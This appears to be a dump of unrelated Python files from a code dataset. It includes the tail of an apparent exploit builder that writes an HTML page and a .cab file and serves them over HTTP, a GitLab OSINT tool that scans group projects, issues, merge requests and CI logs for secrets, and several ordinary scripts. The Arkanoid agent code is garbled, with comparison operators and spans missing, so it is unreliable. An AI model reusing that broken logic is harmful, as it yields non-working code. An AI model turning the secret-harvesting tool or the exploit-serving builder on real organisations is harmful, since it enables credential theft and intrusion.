args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Done write index.html\")\n\t\tprint(\"-> \"+html_dir)\n\n\t# (8) Host Server with instructions\n\tos.chdir(\"output/\"+folder_name+\"/web/\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Completed every steps\")\n\t\tprint(\"-> List of files needed\")\n\t\tprint(\" * \"+cab_dir)\n\t\tprint(\" * \"+html_dir)\n\t\tprint(\" * \"+'output/'+folder_name+\"/web/\"+args.rename)\n\tos.system(\"echo ;python3 -m http.server 80\")\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462801643","text":"\"\"\"\r\nThe template of the main script of the machine learning process\r\n\"\"\"\r\n\r\nimport games.arkanoid.communication as comm\r\nfrom games.arkanoid.communication import ( \\\r\n SceneInfo, GameStatus, PlatformAction\r\n)\r\n\r\ndef ml_loop():\r\n \"\"\"\r\n The main loop of the machine learning process\r\n\r\n This loop is run in a separate process, and communicates with the game process.\r\n\r\n Note that the game process won't wait for the ml process to generate the\r\n GameInstruction. It is possible that the frame of the GameInstruction\r\n is behind of the current frame in the game process. Try to decrease the fps\r\n to avoid this situation.\r\n \"\"\"\r\n\r\n # === Here is the execution order of the loop === #\r\n # 1. Put the initialization code here.\r\n ball_served = False\r\n pre_Ball_x=95\r\n pre_Ball_y=400\r\n m=0\r\n # 2. Inform the game process that ml process is ready before start the loop.\r\n comm.ml_ready()\r\n\r\n # 3. Start an endless loop.\r\n while True:\r\n # 3.1. Receive the scene information sent from the game process.\r\n scene_info = comm.get_scene_info()\r\n\r\n # 3.2. If the game is over or passed, the game process will reset\r\n # the scene and wait for ml process doing resetting job.\r\n if scene_info.status == GameStatus.GAME_OVER or \\\r\n scene_info.status == GameStatus.GAME_PASS:\r\n # Do some stuff if needed\r\n ball_served = False\r\n pre_Ball_x=scene_info.ball[0]\r\n pre_ball_y=scene_info.ball[1]\r\n print(pre_Ball_x,pre_Ball_y)\r\n # 3.2.1. Inform the game process that ml process is ready\r\n comm.ml_ready()\r\n continue\r\n\r\n # 3.3. Put the code here to handle the scene information\r\n \r\n ball_x=scene_info.ball[0]\r\n ball_y=scene_info.ball[1]\r\n platform_x=scene_info.platform[0]\r\n Vx=ball_x-pre_Ball_x\r\n Vy=ball_y-pre_Ball_y\r\n \r\n # 3.4. Send the instruction for this frame to the game process\r\n if not ball_served:\r\n #comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n #comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n comm.send_instruction(scene_info.frame, PlatformAction.SERVE_TO_RIGHT)\r\n ball_served = True\r\n if Vy>0:\r\n newp=down(ball_x,ball_y,Vx,scene_info)\r\n if platform_x+10>newp:\r\n comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n elif platform_x+30newp:\r\n comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n elif platform_x+30400:\r\n break\r\n if Vx>=0:\r\n x+=7\r\n y+=7\r\n if x>=193:\r\n x=400-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y-7br[0] and xbr[1]-5:\r\n if y-70:\r\n x+=7\r\n y-=7\r\n if x>=193:\r\n x=400-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y+7>br[1]+10: #hit bitton\r\n return down(x,y,Vx,scene_info)\r\n else:\r\n Vx=-Vx\r\n break\r\n else:\r\n x-=7\r\n y-=7\r\n if x<=0:\r\n x=-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y+7>br[1]+10:\r\n return down(x,y,Vx,scene_info)\r\n else:\r\n Vx=-Vx\r\n break\r\n return x \r\n","sub_path":"ml_play.py","file_name":"ml_play.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81681026","text":"import argparse\nimport json\nimport os\nimport re\nimport sys\nfrom collections import namedtuple\n\nfrom utilities import constants\n\n\nclass Arguments:\n class __Arguments:\n def __init__(self):\n parser = argparse.ArgumentParser(\n description=\"Collect OSINT for GitLab groups and, optionally, members. Search repository assets for \"\n \"sensitive data.\")\n required_args = parser.add_mutually_exclusive_group(required=True)\n required_args.add_argument('-g', '--group', type=str, action='append',\n help=\"ID or HTML encoded name of a GitLab group. This option, by itself, \"\n \"will display group projects only.\")\n required_args.add_argument('-p', '--project', type=str, action='append',\n help=\"ID or HTML encoded name of a GitLab project. This option, by itself, \"\n \"will display project details only.\")\n parser.add_argument('-u', '--url', default='https://gitlab.com',\n help=\"An optional argument to specify the base URL of your GitLab instance. If the \"\n \"argument is not supplied, its defaulted to 'https://gitlab.com'\")\n parser.add_argument('-m', '--members', action='store_true',\n help=\"Include group members and their personal projects and their related assets in the \"\n \"search for sensitive data.\")\n parser.add_argument('-s', '--snippets', action='store_true',\n help=\"Searches found projects for GitLab Snippets with sensitive data.\")\n parser.add_argument('-i', '--issues', action='store_true',\n help=\"Searches found projects for GitLab Issues and discussions/comments with sensitive \"\n \"data.\")\n parser.add_argument('-r', '--mergerequests', action='store_true',\n help=\"Searches found projects for GitLab Merge Requests and discussions/comments with \"\n \"sensitive data.\")\n parser.add_argument('-j', '--jobs', action='store_true',\n help=\"Searches each projects' public CI job logs for sensitive data starting with the \"\n \"most recent jobs that either succeeded or failed\")\n parser.add_argument('-d', '--depth', type=int,\n help=\"Limit the number of requests across ALL targeted assets including group projects\")\n parser.add_argument('-t', '--timestamp', action='store_true',\n help='Disables display of start/finish times and originating IP to the output')\n parser.add_argument('-x', '--proxy', type=str, action='store',\n help='Proxies all requests using the provided URI matching the scheme: '\n 'http(s)://user:pass@10.10.10.10:8000')\n parser.add_argument('-c', '--cert', type=str, action='store',\n help='Used in tandem with -p (--proxy), this switch provides a fully qualified path to a '\n 'certificate to verify TLS connections. Provide a fully qualified path to the dynamic '\n 'cert. Example: /Users//owasp_zap_root_ca.cer.')\n parser.add_argument('-l', '--logfile', type=str, action='store',\n help='Will APPEND all output to specified file.')\n\n constants.Banner.render()\n\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n self.parsed_args = parser.parse_args()\n if self.parsed_args.proxy and not self.parsed_args.cert:\n parser.error('If you specify a proxy address, you must also specify a dynamic certificate in order to '\n 'decrypt TLS traffic with the --cert switch.')\n\n instance = None\n\n def __init__(self):\n if not Arguments.instance:\n Arguments.instance = Arguments.__Arguments()\n\n def __getattr__(self, name):\n return getattr(self.instance.parsed_args, name)\n\n\nJobLog = namedtuple('JobLog', 'ident web_url trace')\nIssue = namedtuple('Issue', 'ident web_url description')\nMergeRequest = namedtuple('MergeRequest', 'ident web_url description')\nComment = namedtuple('Comment', 'comment_type parent_url comment_body')\nSecret = namedtuple('Secret', 'secret_type secret url')\n\n\nclass SecretsMonitor:\n\n def __init__(self):\n with open(os.path.join(os.path.dirname(__file__), \"../regexes.json\")) as f:\n self.regexes = json.loads(f.read())\n\n self.regex_names = self.__regex_names(self.regexes)\n self.master_regex = self.__compile_regexes(self.regexes)\n\n def __regex_names(self, regexes):\n \"\"\" Returns a dict containing regex names keyed by group\n \"\"\"\n return {self.__group(i): name for i, name in enumerate(regexes)}\n\n def __compile_regexes(self, regexes):\n \"\"\" Concatenates all regexes into one big, compiled regex.\n \"\"\"\n parts = []\n for i, name in enumerate(regexes):\n group = self.__group(i)\n regex = regexes[name]\n parts.append(f'(?P<{group}>{regex})')\n\n return re.compile('|'.join(parts))\n\n def __group(self, i):\n return f'group_{i}'\n\n def sniff_secrets(self, content):\n if not content:\n return []\n\n secrets = []\n for web_url, raw_data in content.items():\n found_secrets = self.__get_secrets(raw_data)\n for secret_type, secret in found_secrets.items():\n secrets.append(Secret(secret_type, secret, web_url))\n return secrets\n\n def __get_secrets(self, content):\n result = {}\n if not content:\n return result\n match = self.master_regex.search(content)\n if not match:\n return result\n for group, value in match.groupdict().items():\n if value is None:\n continue\n name = self.regex_names[group]\n result[name] = value\n return result\n","sub_path":"utilities/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162278642","text":"# dlfile.py\n\nimport urllib.request\n\ndef downloadfile(url, filename):\n try:\n with urllib.request.urlretrieve(url, filename) as response, open(filename, \"wb\") as file:\n data = response.read()\n file.write(data)\n except AttributeError:\n print(\"Got an AttributeError\")\n \n\nurl = input(\"URL: \")\nfilename = url.split(\"/\")[-1]\nprint(filename)\ndownloadfile(url, filename)\n","sub_path":"dlfily.py","file_name":"dlfily.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415118436","text":"import rpyc\nfrom rpyc.utils.helpers import classpartial\nfrom rpyc.utils.server import ThreadedServer\n\nimport threading\nimport logging\n\nimport sys\nimport os\nimport time\n\nimport signal\n\n\nclass AppClient:\n\n class PortThread(threading.Thread):\n\n class Port(rpyc.Service):\n def __init__(self, app):\n super().__init__()\n self._app = app\n\n def on_connect(self, conn):\n # code that runs when a connection is created\n # (to init the service, if needed)\n pass\n\n def on_disconnect(self, conn):\n # code that runs after the connection has already closed\n # (to finalize the service, if needed)\n pass\n\n def exposed_updateServiceState(self, state):\n self._app.setServiceState(state)\n logging.getLogger().debug('Status updated! Changed to: '+ str(state))\n\n def __init__(self, app):\n threading.Thread.__init__(self)\n self._app = app\n\n def run(self):\n logging.getLogger().debug('PortThread: Starting thread...')\n self.startPort()\n logging.getLogger().debug('PortThread: Thread finished')\n\n def startPort(self):\n portConstructor = classpartial(self.Port, self._app)\n self._portServer = ThreadedServer(portConstructor, port=18870)\n self._portServer.start()\n\n def closePort(self):\n self._portServer.close()\n\n def __init__(self):\n self._serviceState = None\n\n self._portThread = self.PortThread(self)\n self._portThread.start()\n\n logging.getLogger().info('Started client with port thread')\n\n def subscribeToService(self):\n # polaczenie z usluga\n self._servicePort = rpyc.connect(\"localhost\", 18860)\n self._servicePort.root.register_observer(18870, 'testClient')\n self._serviceState = self._servicePort.root.get_state()\n logging.getLogger().info(\"Present state: {}\".format(self._serviceState))\n # zamykam wychodzace polaczenie z usluga\n #self._servicePort.close()\n\n def unsubscribeFromService(self):\n # polaczenie z usluga\n #self._servicePort = rpyc.connect(\"localhost\", 18860)\n self._servicePort.root.remove_observer('testClient')\n # zamykam wychodzace polaczenie z usluga\n self._servicePort.close()\n\n def setServiceState(self, state):\n self._serviceState = state\n\n def closeApp(self):\n logging.getLogger().info('Zamykam polaczenie')\n self.unsubscribeFromService()\n # zamknij polaczenia przychodzace\n self._portThread.closePort()\n\n\nlogs = logging.getLogger()\nlogs.setLevel(logging.DEBUG)\nhandlerConsole = logging.StreamHandler()\nhandlerConsole.setLevel(logging.DEBUG)\nformatterMain = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S'\n)\nhandlerConsole.setFormatter(formatterMain)\nlogs.addHandler(handlerConsole)\n\n\n\napp = AppClient()\napp.subscribeToService()\n\n\nwhile True:\n nb = input('Type `q` to close: ')\n if nb == 'q':\n break\n\napp.closeApp()\n","sub_path":"winservicewatch/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"82512418","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\nfrom math import floor\n\n\ndef merge(arrA, arrB):\n elements = len(arrA) + len(arrB)\n merged_arr = []\n# merged_arr = [0] * elements\n\n # Your code here\n # compare first elements of arrA and arrB\n # remove the smaller from arrA or arrB and put into merged_arr\n while len(arrA) > 0 and len(arrB) > 0:\n if arrA[0] >= arrB[0]:\n merged_arr.append(arrB.pop(0))\n print(merged_arr)\n else:\n merged_arr.append(arrA.pop(0))\n print(merged_arr)\n\n # handle any leftover list elements\n while len(arrA) > 0:\n merged_arr.append(arrA.pop(0))\n while len(arrB) > 0:\n merged_arr.append(arrB.pop(0))\n\n return merged_arr\n\n\n# TO-DO: implement the Merge Sort function below USING RECURSION\n# split thearray here\ndef merge_sort(arr):\n # Your code here\n\n if len(arr) <= 1:\n return arr\n\n midpoint = floor(len(arr)/2)\n left = arr[:midpoint]\n right = arr[midpoint:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n arr = merge(left, right)\n return arr\n\n\n# implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # Your code here\n pointer1 = start+1\n if arr[start] <= arr[pointer1]:\n return arr\n return arr\n\n\ndef merge_sort_in_place(arr, l, r):\n # Your code here\n if len(arr) <= 1:\n return arr\n\n midpoint = floor((r-l)/2)\n merge_sort_in_place(arr, l, midpoint)\n merge_sort_in_place(arr, midpoint, r)\n\n merge_in_place(arr, l, midpoint, r)\n\n return arr\n\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\n# def timsort(arr):\n# # Your code here\n#\n# return arr\n","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"580239939","text":"from django.db import models\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.search import index\nfrom modelcluster.models import ClusterableModel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n MultiFieldPanel,\n InlinePanel,\n FieldRowPanel\n)\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom django import forms\nfrom .enums import VehicleFeatureChoice, VehicleTypeChoice\nfrom wagtailmetadata.models import MetadataMixin\nfrom django.utils.translation import ugettext_lazy\n\nclass Place(index.Indexed, ClusterableModel):\n name = models.CharField(max_length = 255, null = False, blank = False, unique=True)\n details = models.TextField(null = False, blank = False, help_text = \"Add place details\")\n\n duration_of_visit = models.DurationField(null = True,\n blank = True,\n default = '00:00:00',\n verbose_name = ('Duration Of Visit (HH:MM:SS)'),\n help_text = ('[DD] [HH:[MM:]]ss[.uuuuuu] format')\n )\n\n map_icon = models.ForeignKey(\n \"wagtailimages.Image\",\n null = True,\n blank = True,\n on_delete = models.SET_NULL,\n related_name = \"+\"\n )\n\n trip_types = ParentalManyToManyField('TripType', blank = False)\n location_tags = ParentalManyToManyField('LocationTag', blank = False)\n panels = [\n FieldPanel(\"name\"),\n FieldPanel(\"details\"),\n FieldPanel(\"duration_of_visit\"),\n ImageChooserPanel(\"map_icon\"),\n MultiFieldPanel([\n InlinePanel(\"place_images\", min_num=1),\n ], heading=\"Images\" ),\n FieldPanel('trip_types', widget = forms.CheckboxSelectMultiple),\n FieldPanel('location_tags', widget = forms.CheckboxSelectMultiple),\n ]\n\n search_fields = [\n index.SearchField('name', partial_match = True),\n ]\n\n def __str__(self):\n return self.name\n\nregister_snippet(Place)\n\nclass PlaceImages(Orderable):\n place = ParentalKey('Place',\n related_name = \"place_images\",\n null = False,\n blank = False\n )\n image = models.ForeignKey(\n \"wagtailimages.Image\",\n null = True,\n blank = False,\n on_delete = models.CASCADE,\n related_name = \"+\"\n )\n\n\n panels = [\n ImageChooserPanel(\"image\"),\n ]\n\n \"\"\"def get_absolute_url(self):\n\n Returns absolute url for banner_image to generate image site map\n\n kwargs = {'slug': self.slug}\n return reverse('places.detail', kwargs=kwargs)\"\"\"\n\n def place_image_url(self):\n \"\"\"\n Returns the banner_image url for XML images sitemap.\n \"\"\"\n url = settings.MEDIA_URL + self.image.file.name\n print(self.image.file.name)\n return url if self.image else ''\n\n def place_image_title(self):\n \"\"\"\n Returns the banner_image title for XML images sitemap.\n \"\"\"\n return self.image.title if self.image else ''\n\n class Meta:\n unique_together = (\n ('place', 'image'),\n )\n\n\nclass LocationTag(models.Model):\n tag = models.CharField(max_length = 255, blank = False, null = False, unique=True, help_text = \"Location tag\")\n\n panels = [\n FieldPanel(\"tag\"),\n ]\n\n def __str__(self):\n return self.tag\n\n class Meta:\n verbose_name = \"Location Tag\"\n verbose_name_plural = \"Location Tags\"\n\n\nregister_snippet(LocationTag)\n\nclass TripType(models.Model):\n trip_type = models.CharField(max_length = 255, blank = False, null = False, unique=True, help_text = \"Trip type\")\n\n panels = [\n FieldPanel(\"trip_type\"),\n ]\n\n def __str__(self):\n return self.trip_type\n\n class Meta:\n verbose_name = \"Trip Type\"\n verbose_name_plural = \"Trip Types\"\n\n\nregister_snippet(TripType)\n\nclass FareTable(models.Model):\n vehicle_type = models.CharField(max_length = 50,\n blank = False,\n null = False,\n choices = [(type.value, type.name.replace(\"_\", \" - \").upper()) for type in VehicleTypeChoice],\n default = VehicleTypeChoice.hatchback\n )\n\n model = models.CharField(max_length = 255, blank = False, null = False)\n seater = models.PositiveSmallIntegerField(null = False, default = 0)\n per_km_rate = models.PositiveSmallIntegerField(null = False, default = 0, verbose_name = ('Per km rate (\\u20B9)'))\n vehicle_feature = models.CharField( max_length = 20,\n choices = [(feature.value, feature.name.replace(\"_\", \" - \").upper()) for feature in VehicleFeatureChoice],\n default = VehicleFeatureChoice.AC\n )\n\n panels = [\n FieldPanel(\"vehicle_type\"),\n FieldPanel(\"model\"),\n FieldPanel(\"seater\"),\n FieldPanel(\"per_km_rate\"),\n FieldPanel(\"vehicle_feature\"),\n ]\n\n def __str__(self):\n return self.vehicle_type +' - '+ self.model\n\n class Meta:\n verbose_name = \"Fare\"\n verbose_name_plural = \"Fares\"\n\n\nregister_snippet(FareTable)\n\n\nclass PopularRoutes(ClusterableModel):\n region = models.CharField(max_length = 255, blank = False, null = True, unique=True)\n\n panels = [\n FieldPanel(\"region\"),\n MultiFieldPanel([\n InlinePanel(\"region_routes\", min_num=1),\n ], heading=\"Poular Routes\"),\n ]\n\n class Meta:\n verbose_name = \"Popular Route\"\n verbose_name_plural = \"Popular Routes\"\n\n def __str__(self):\n return self.region;\n\nregister_snippet(PopularRoutes)\n\nclass RouteLink(Orderable):\n popular_route = ParentalKey('PopularRoutes',\n related_name = \"region_routes\",\n null = False,\n blank = False\n )\n name = models.CharField(max_length = 255, blank = False, null = False, unique = True)\n url = models.URLField()\n\n panels = [\n FieldRowPanel([\n FieldPanel('name', classname=\"col6\"),\n FieldPanel('url', classname=\"col6\"),\n ]),\n ]\n class Meta:\n unique_together = (\n ('popular_route', 'name'),\n )\n\nclass PageMetadataMixin(MetadataMixin, models.Model):\n \"\"\"An implementation of MetadataMixin for Wagtail pages.\"\"\"\n search_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.SET_NULL,\n verbose_name=ugettext_lazy('Search image')\n )\n\n promote_panels = [\n MultiFieldPanel([\n FieldPanel('slug'),\n FieldPanel('seo_title'),\n FieldPanel('show_in_menus'),\n FieldPanel('search_description'),\n ImageChooserPanel('search_image'),\n FieldPanel('canonical_url'),\n FieldPanel('robots_tag')\n\n ], ugettext_lazy('Common page configuration')),\n ]\n\n def get_meta_url(self):\n return self.full_url\n\n def get_meta_title(self):\n return self.seo_title or self.title\n\n def get_meta_description(self):\n return self.search_description\n\n def get_meta_image(self):\n return self.search_image\n\n def get_canonical_url(self):\n return self.canonical_url\n\n def get_robots_tag(self):\n return self.robots_tag\n\n class Meta:\n abstract = True\n","sub_path":"outstation/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"636085137","text":"\"\"\" Lab 8 - Sprites \"\"\"\r\n\r\nimport arcade\r\nimport math\r\nfrom random import randrange\r\n\r\n# --- Constants ---\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\n\r\n\r\nclass MyGame(arcade.Window):\r\n \"\"\" Our Custom Window Class\"\"\"\r\n\r\n def __init__(self):\r\n \"\"\" Initializer \"\"\"\r\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, \"Lab 7 - User Control\")\r\n self.set_update_rate(1 / 60)\r\n # Player sprite and score\r\n self.player = arcade.Sprite(\"Sprites/Particle.png\", 1)\r\n self.score = 0\r\n # Good particles variables\r\n self.good = arcade.SpriteList()\r\n self.good_max_amount = 10\r\n self.good_x = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n self.good_y = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n # Bad particles variables\r\n self.bad = arcade.SpriteList()\r\n self.bad_max_amount = 10\r\n self.bad_x = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n self.bad_y = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n # Sounds\r\n self.good_sound = arcade.Sound(\"Sounds/270304__littlerobotsoundfactory__collect-point-00.wav\")\r\n self.bad_sound = arcade.Sound(\"Sounds/270332__littlerobotsoundfactory__hit-03.wav\")\r\n # Background (I didn't add one)\r\n pass\r\n # Mouse (Since we move the player with the mouse, we'll make the cursor invisible)\r\n self.set_mouse_visible(False)\r\n\r\n def setup(self):\r\n # Create good particles\r\n for i in range(self.good_max_amount):\r\n self.good.append(arcade.Sprite(\"Sprites/Proton.png\", 1, center_x=randrange(SCREEN_WIDTH),\r\n center_y=randrange(SCREEN_HEIGHT)))\r\n self.good_x[i] = randrange(-4, 4, 1)\r\n self.good_y[i] = randrange(-4, 4, 1)\r\n # Create bad particles\r\n for i in range(self.bad_max_amount):\r\n self.bad.append(arcade.Sprite(\"Sprites/Electron.png\", 1, center_x=randrange(SCREEN_WIDTH),\r\n center_y=randrange(SCREEN_HEIGHT)))\r\n self.bad_x[i] = randrange(-4, 4, 1)\r\n self.bad_y[i] = randrange(-4, 4, 1)\r\n\r\n def on_draw(self):\r\n \"\"\"Function to draw on screen\"\"\"\r\n arcade.start_render()\r\n self.player.draw()\r\n self.good.draw()\r\n self.bad.draw()\r\n arcade.draw_text(\"Score: \" + str(self.score), 0, 0, arcade.color.WHITE, font_size=20)\r\n\r\n def on_update(self, delta_time: float):\r\n \"\"\"Here goes the game logic\"\"\"\r\n self.upd_particles()\r\n self.handle_collisions(self.good, self.good_x, self.good_y, self.good_sound, 1)\r\n self.handle_collisions(self.bad, self.bad_x, self.bad_y, self.bad_sound, -1)\r\n\r\n @staticmethod\r\n def pos_update(sprite: arcade.Sprite, speed_x, speed_y):\r\n \"\"\"Function that updates the position of a sprite WITHIN the screen\"\"\"\r\n # x axis\r\n sprite.center_x += speed_x\r\n if sprite.center_x >= SCREEN_WIDTH:\r\n sprite.center_x = 1\r\n elif sprite.center_x <= 0:\r\n sprite.center_x = SCREEN_WIDTH - 1\r\n # y axis\r\n sprite.center_y += speed_y\r\n if sprite.center_y >= SCREEN_HEIGHT:\r\n sprite.center_y = 1\r\n elif sprite.center_y < 0:\r\n sprite.center_y = SCREEN_HEIGHT - 1\r\n\r\n def upd_particles(self):\r\n \"\"\"Funcion that updates every particle\"\"\"\r\n i = 0\r\n for elem in self.good:\r\n self.pos_update(elem, self.good_x[i], self.good_y[i])\r\n i += 1\r\n i = 0\r\n for elem in self.bad:\r\n self.pos_update(elem, self.bad_x[i], self.bad_y[i])\r\n i += 1\r\n\r\n def handle_collisions(self, s_list: arcade.SpriteList, x: list, y: list, sound: arcade.Sound, score_mod: int):\r\n \"\"\"Function that detects and handles collitions\"\"\"\r\n i = 0\r\n for elem in s_list:\r\n if elem.collides_with_sprite(self.player):\r\n self.score += score_mod\r\n elem.center_x, elem.center_y = randrange(SCREEN_WIDTH), randrange(SCREEN_HEIGHT)\r\n x[i] = randrange(-4, 4, 1)\r\n y[i] = randrange(-4, 4, 1)\r\n sound.play()\r\n\r\n def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):\r\n \"\"\"Player movement\"\"\"\r\n self.player.center_x = x\r\n self.player.center_y = y\r\n\r\n\r\ndef main():\r\n window = MyGame()\r\n window.setup()\r\n arcade.run()\r\n\r\n\r\nmain()\r\n","sub_path":"lab08-sprites/lab08-sprites.py","file_name":"lab08-sprites.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239093390","text":"import openpyxl\nimport random\n\nfrom openpyxl.workbook import workbook\n\n\"\"\"\"\n 读取excel文件\n\"\"\"\n\nimport openpyxl\n\npath = '/Users/houjianan/Documents/GitHub/Python/Basic/Excel/source/第二批车辆投放及商家入驻情况.xlsx'\nwb = openpyxl.load_workbook(path)\n# 获取所有工作表名\nnames = wb.sheetnames\n# wb.get_sheet_by_name(name) 已经废弃,使用wb[name] 获取指定工作表\nsheet = wb[names[0]]\n# 获取最大行数\nmaxRow = sheet.max_row\n# 获取最大列数\nmaxColumn = sheet.max_column\n# 获取当前活动表\ncurrent_sheet = wb.active\n# 获取当前活动表名称\ncurrent_name = sheet.title\n# 通过名字访问Cell对象, 通过value属性获取值\na1 = sheet['A1'].value\n# 通过行和列确定数据\na12 = sheet.cell(row=1, column=2).value\n# 获取列字母\ncolumn_name = openpyxl.utils.cell.get_column_letter(1)\n# 将列字母转为数字, 参数忽略大小写\ncolumn_name_num = openpyxl.utils.cell.column_index_from_string('a')\n# 获取一列数据, sheet.iter_rows() 获取所有的行\n\"\"\"\n(, , )\n(, , )\n(, , )\n(, , )\n(, , )\n\"\"\"\n# print(sheet.iter_cols)\nSN = []\nindex = 18010124000\nmin_row = 3\nfor one_column_data in sheet.iter_rows(min_row=min_row):\n A = one_column_data[0]\n if isinstance(A.value, int):\n A1 = str(A.value)[-3:]\n # print(A1)\n index += 1000\n item = index + int(A1)\n # print(item)\n sheet.cell(row=min_row, column=4, value=item)\n min_row += 1\n else:\n print(\"==\")\n\nwb.save(path)\nprint(\"保存完毕\")\n\n# for row_index, row_item in enumerate(data):\n\n# for col_index, col_item in enumerate(row_item):\n# # 写入\n# sheet.cell(row=row_index+1, column=col_index+1, value=col_item)\n\n# # 写入excel文件 如果path路径的文件不存在那么就会自动创建\n# workbook.save(path)\n# print('写入成功')\n\n# 获取一行数据, sheet.iter_cols() 获取所有的列\n\"\"\"\n(, , )\n(, , )\n(, , )\n\"\"\"\n# for one_row_data in sheet.iter_cols():\n# print(one_row_data[1].value, end=\"\\t\")\n\n# print(\"row = {}, column = {}\".format(maxRow, maxColumn))\n\n\n# def write_to_excel(path: str, sheetStr, info, data):\n\n# # 实例化一个workbook对象\n# workbook = openpyxl.Workbook()\n# # 激活一个sheet\n# sheet = workbook.active\n# # 为sheet设置一个title\n# sheet.title = sheetStr\n\n# # 添加表头(不需要表头可以不用加)\n# data.insert(0, list(info))\n# # 开始遍历数组\n# for row_index, row_item in enumerate(data):\n\n# for col_index, col_item in enumerate(row_item):\n# # 写入\n# sheet.cell(row=row_index+1, column=col_index+1, value=col_item)\n\n# # 写入excel文件 如果path路径的文件不存在那么就会自动创建\n# workbook.save(path)\n# print('写入成功')\n\n\n# if __name__ == '__main__':\n\n# # 数据结构1 path 文件的路径\n# path = r'第二批车辆投放及商家入驻情况.xls'\n# # 数据结构1Excel 中sheet 的名字\n# sheetStr = '车辆-修改'\n\n# info = ['name', 'age', 'address']\n# # 数据结构1数据\n# writeData = [['John Brown', 18, 'New York No. 1 Lake Park']]\n\n# # 执行\n# write_to_excel(path, sheetStr, info, writeData)\n","sub_path":"开发相关/Python/Basic/Excel/exercise/第二批车辆投放及商家入驻情况.py","file_name":"第二批车辆投放及商家入驻情况.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116237707","text":"REGISTER_REQUEST = 1\nREGISTER_RESPONSE = 2\nTOPOLOGY_UPDATE = 3\nKEEP_ALIVE = 4\nROUTE_UPDATE = 5\n\n#SERVER_IP = 'localhost'\n#SERVER_PORT = 5024\nSERVER_ID = 0\n\nclass CommandSDN(object):\n\n\tdef __init__(self, cmd, src, dest, data, length):\n\t\tself.cmd = cmd\n\t\tself.src = src\n\t\tself.dest = dest\n\t\tself.data = data\n\t\tself.len = length\n\t\treturn\n\nclass Tee(object):\n def __init__(self, *files):\n self.files = files\n def write(self, obj):\n for f in self.files:\n f.write(obj)\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"538131446","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@Author: yangwenhao\n@Contact: 874681044@qq.com\n@Software: PyCharm\n@File: test_data_rand.py\n@Time: 2021/5/19 15:39\n@Overview:\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport os.path as osp\nimport sys\nimport time\n# Version conflict\nimport warnings\n\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom kaldi_io import read_mat\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\n\nfrom Process_Data.Datasets.KaldiDataset import ScriptTrainDataset\nfrom Process_Data.audio_processing import ConcateNumInput_Test\nfrom logger import NewLogger\n\nwarnings.filterwarnings(\"ignore\")\n\nimport torch._utils\n\ntry:\n torch._utils._rebuild_tensor_v2\nexcept AttributeError:\n def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, 